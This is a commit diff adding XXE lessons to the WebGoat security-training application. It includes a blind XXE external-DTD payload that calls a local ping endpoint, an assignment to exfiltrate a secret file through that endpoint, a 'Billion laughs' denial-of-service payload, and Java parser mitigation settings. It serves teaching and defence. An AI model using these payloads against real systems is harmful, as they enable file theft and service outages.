- Introduced user registration
- Now using Spring Boot for classloading, this way local development does not need to restart the complete server - Fixed all kinds of dependencies on the names of the lessons necessary to keep in mind during the creation of a lesson. - Simplied loading of resources, by adding resource mappings in MvcConfig. - Refactored plugin loading, now only one class is left for loading the lessons.
This commit is contained in:
Nanne Baars
@ -0,0 +1,55 @@
|
||||
== Blind XXE
|
||||
|
||||
In some cases you will see no output because although your attack might have worked the field is not reflected in the output of page.
|
||||
Or the resource you are trying to read contains illegal XML character which causes the parser to fail.
|
||||
Let's start with an example, in this case we reference a external DTD which we control on our own server.
|
||||
|
||||
Our WebGoat server by default has an /xxe/ping endpoint which we can use. *This can be any server you control.*
|
||||
|
||||
[source]
|
||||
----
|
||||
curl -i http://localhost:8080/WebGoat/XXE/ping
|
||||
|
||||
will result in:
|
||||
|
||||
GET curl/7.45.0
|
||||
----
|
||||
|
||||
at the server side.
|
||||
|
||||
How do we use this endpoint to verify whether we can perform XXE?
|
||||
|
||||
In the `~/${user.home}/.webgoat/plugin/XXE` create a file called attack.dtd
|
||||
|
||||
[source]
|
||||
----
|
||||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
<!ENTITY ping SYSTEM 'http://localhost:8080/WebGoat/XXE/ping?text=HelloWorld'>
|
||||
----
|
||||
|
||||
Now submit the form and change the xml to:
|
||||
|
||||
[source]
|
||||
----
|
||||
<?xml version="1.0"?>
|
||||
<!DOCTYPE root [
|
||||
<!ENTITY % remote SYSTEM "http://localhost:8080/WebGoat/plugin_lessons/plugin/XXE/attack.dtd">
|
||||
%remote;
|
||||
]>
|
||||
<user>
|
||||
<username>test&ping;</username>
|
||||
</user>
|
||||
----
|
||||
|
||||
Now if we check our server log we will see:
|
||||
|
||||
[source]
|
||||
----
|
||||
GET Java/1.8.0_101 HelloWorld
|
||||
----
|
||||
|
||||
So with the XXE we are able to ping our own server which means XXE injection is possible.
|
||||
|
||||
[NOTE]
|
||||
In this case we use http://localhost:8080/WebGoat/plugin_lessons/plugin/XXE/test.dtd to fetch the dtd but in reality this will
|
||||
of course be a host fully under the attackers control.
|
||||
@ -0,0 +1,7 @@
|
||||
== Blind XXE assignment
|
||||
|
||||
In the previous page we showed you how you can ping a server with a XXE attack, in this assigment try to make a DTD which will upload the
|
||||
contents of ~/.webgoat/plugin/XXE/secret.txt to our server. For Linux: `/home/USER/.webgoat/XXE/secret.txt`, for Windows
|
||||
this would be `c:/Users/USER/.webgoat/XXE/secret.txt`
|
||||
|
||||
Try to upload this file using the following endpoint: `http://localhost:8080/WebGoat/XXE/ping?text=[contents_file]` (NOTE: this endpoint is under your full control)
|
||||
@ -0,0 +1,7 @@
|
||||
== Modern REST framework
|
||||
|
||||
In modern REST frameworks the server might be able to accepts data formats that you as a developer did not think about.
|
||||
So this might result in JSON endpoints being vulnerable to XXE attacks.
|
||||
|
||||
Again same exercise but try to perform the same XML injection as we did in first assigment.
|
||||
|
||||
@ -0,0 +1,39 @@
|
||||
=== What is a XML entity?
|
||||
|
||||
An XML Entity allows tags to be defined that will be replaced by content when the XML Document is parsed.
|
||||
In general there are three types of entities:
|
||||
* internal entities
|
||||
* external entities
|
||||
* parameter entities.
|
||||
|
||||
An entity must be created in the Document Type Definition (DTD), let's start with an example:
|
||||
|
||||
[source]
|
||||
----
|
||||
<?xml version="1.0" standalone="yes" ?>
|
||||
<!DOCTYPE author [
|
||||
<!ELEMENT author (#PCDATA)>
|
||||
<!ENTITY js "Jo Smith">
|
||||
]>
|
||||
<author>&js;</author>
|
||||
----
|
||||
|
||||
So everywhere you use the entity ``&js;` the parser will replace it with the value defined in the entity.
|
||||
|
||||
=== What is an XXE injection?
|
||||
|
||||
An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a
|
||||
reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data,
|
||||
denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts.
|
||||
|
||||
Attacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative
|
||||
paths in the system identifier. Since the attack occurs relative to the application processing the XML document, an attacker may use this
|
||||
trusted application to pivot to other internal systems, possibly disclosing other internal content via http(s) requests or launching a CSRF attack to
|
||||
any unprotected internal services. In some situations, an XML processor library that is vulnerable to client-side memory corruption issues
|
||||
may be exploited by dereferencing a malicious URI, possibly allowing arbitrary code execution under the application account. Other attacks can access
|
||||
local resources that may not stop returning data, possibly impacting application availability if too many threads or processes are not released.
|
||||
|
||||
In general we can distinguish the following kind of XXE attacks:
|
||||
* Classic: in this case an external entity is included in a local DTD
|
||||
* Blind: no output and or errors are shown in the response
|
||||
* Error: try to get the content of a resource in the error message
|
||||
@ -0,0 +1,21 @@
|
||||
== XXE mitigation
|
||||
|
||||
In order to protect against XXE attacks you need to make sure you validate the input received from an untrusted client.
|
||||
In the Java world you can also instruct your parser to ignore DTD completely, for example:
|
||||
|
||||
[source]
|
||||
----
|
||||
XMLInputFactory xif = XMLInputFactory.newFactory();
|
||||
xif.setProperty(XMLInputFactory.SUPPORT_DTD, false);
|
||||
----
|
||||
|
||||
if you are not able to completely switch off the DTD support, you can also instruct the XML parser to ignore external entities, like:
|
||||
|
||||
[source]
|
||||
----
|
||||
XMLInputFactory xif = XMLInputFactory.newFactory();
|
||||
xif.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
|
||||
xif.setProperty(XMLInputFactory.SUPPORT_DTD, true);
|
||||
----
|
||||
|
||||
For more information about configuration, see https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet
|
||||
@ -0,0 +1,29 @@
|
||||
== XXE DOS attack
|
||||
|
||||
With the same XXE attack we can perform a DOS service attack towards the server. An example of such an attack is:
|
||||
|
||||
[source]
|
||||
----
|
||||
<?xml version="1.0"?>
|
||||
<!DOCTYPE lolz [
|
||||
<!ENTITY lol "lol">
|
||||
<!ELEMENT lolz (#PCDATA)>
|
||||
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
|
||||
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
|
||||
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
|
||||
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
|
||||
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
|
||||
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
|
||||
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
|
||||
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
|
||||
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
|
||||
]>
|
||||
<lolz>&lol9;</lolz>
|
||||
----
|
||||
|
||||
When XML parser loads this document, it sees that it includes one root element, "lolz", that contains the text "&lol9;". However, "&lol9;" is a defined
|
||||
entity that expands to a string containing ten "&lol8;" strings. Each "&lol8;" string is a defined entity that expands to ten "&lol7;" strings, and so on.
|
||||
After all the entity expansions have been processed, this small (< 1 KB) block of XML will actually take up almost 3 gigabytes of memory.
|
||||
|
||||
This is called a "Billion laughs", more information can be found here: https://en.wikipedia.org/wiki/Billion_laughs
|
||||
|
||||
@ -0,0 +1,11 @@
|
||||
= XML External Entity (XXE) Processing
|
||||
|
||||
== Concept
|
||||
|
||||
This lesson teaches how to perform a XML External Entity attack is and how it can be abused and protected against.
|
||||
|
||||
== Goals
|
||||
|
||||
* The user should have basic knowledge of XML
|
||||
* The user will understand how XML parsers work
|
||||
* The user will learn to perform a XXE attack and how to protected against it.
|
||||
@ -0,0 +1,4 @@
|
||||
== Let's try
|
||||
|
||||
In this assignment you will need to sign up with a registration form. When submitting the form try to execute an XXE injection with the
|
||||
username field. Try listing the root directory of the filesystem.
|
||||
@ -0,0 +1,15 @@
|
||||
|
||||
|
||||
- Describe how the attack works / should be some outpu
|
||||
|
||||
<p><b>Concept / Topic To Teach:</b> </p>
|
||||
This lesson teaches how to perform XML External Entity Attacks.
|
||||
<br>
|
||||
<div align="Left">
|
||||
<p>
|
||||
<b>How the attacks works:</b>
|
||||
</p>
|
||||
An XML External Entity attack is a type of attack against an application that parses XML input.
|
||||
This attack occurs when XML input containing a reference to an external entity is processed by a weakly
|
||||
configured XML parser. This attack may lead to the disclosure of confidential data, denial of service,
|
||||
server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts.
|
||||
Reference in New Issue
Block a user